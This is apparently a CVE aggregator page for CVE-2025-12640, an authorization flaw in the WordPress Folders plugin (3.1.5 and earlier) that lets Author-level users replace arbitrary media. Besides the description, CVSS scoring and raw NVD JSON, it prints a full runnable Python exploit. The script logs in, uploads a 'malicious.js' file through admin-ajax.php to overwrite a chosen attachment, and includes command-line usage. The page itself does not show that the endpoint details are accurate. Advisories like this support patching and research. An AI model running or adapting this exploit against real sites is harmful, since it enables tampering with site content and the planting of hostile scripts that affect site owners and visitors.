Security Vulnerability Report
中文
CVE-2025-12640 CVSS 4.3 MEDIUM

CVE-2025-12640

Published: 2026-01-08 03:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. This is due to missing object-level authorization checks in the handle_folders_file_upload() function. This makes it possible for authenticated attackers, with Author-level access and above, to replace arbitrary media files from the WordPress Media Library.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Folders插件 <= 3.1.5 (所有受影响的版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from urllib.parse import urlencode # CVE-2025-12640 PoC - Unauthorized Media Replacement # Target: WordPress Folders Plugin <= 3.1.5 def exploit_cve_2025_12640(target_url, username, password, target_attachment_id, malicious_file_path): """ Exploit for CVE-2025-12640: Unauthorized Arbitrary Media Replacement Args: target_url: Target WordPress site URL username: WordPress user with Author-level access password: User password target_attachment_id: ID of the media file to replace malicious_file_path: Path to the malicious file to upload """ session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Read malicious file content try: with open(malicious_file_path, 'rb') as f: file_content = f.read() except Exception as e: print(f"[-] Failed to read malicious file: {e}") return False # Step 3: Exploit the vulnerability via AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious file for upload files = { 'file': ('malicious.js', file_content, 'application/javascript') } # Key parameter: folder_id with target attachment ID data = { 'action': 'folders_handle_file_upload', 'folder_id': target_attachment_id, # Target attachment ID to replace 'is_featured': '0', 'post_id': '0' } response = session.post(ajax_url, data=data, files=files) if response.status_code == 200: result = response.json() if response.headers.get('content-type', '').find('json') != -1 else response.text print(f"[+] Exploitation attempt completed") print(f"[+] Response: {result}") return True else: print(f"[-] Exploitation failed with status code: {response.status_code}") return False if __name__ == "__main__": if len(sys.argv) < 6: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <attachment_id> <malicious_file>") print(f"Example: python {sys.argv[0]} http://target.com admin password 123 malicious.js") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] attachment_id = sys.argv[4] malicious_file = sys.argv[5] exploit_cve_2025_12640(target_url, username, password, attachment_id, malicious_file)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12640", "sourceIdentifier": "[email protected]", "published": "2026-01-08T03:15:42.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. This is due to missing object-level authorization checks in the handle_folders_file_upload() function. This makes it possible for authenticated attackers, with Author-level access and above, to replace arbitrary media files from the WordPress Media Library."}, {"lang": "es", "value": "El plugin Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager para WordPress es vulnerable a Reemplazo Arbitrario de Medios No Autorizado en todas las versiones hasta la 3.1.5, inclusive. Esto se debe a la falta de comprobaciones de autorización a nivel de objeto en la función handle_folders_file_upload(). Esto hace posible que atacantes autenticados, con acceso de nivel Autor y superior, reemplacen archivos multimedia arbitrarios de la biblioteca de medios de WordPress."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3402986/folders/tags/3.1.6/includes/media.replace.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6432a4-6597-4d1e-b63d-c007a301d1b2?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.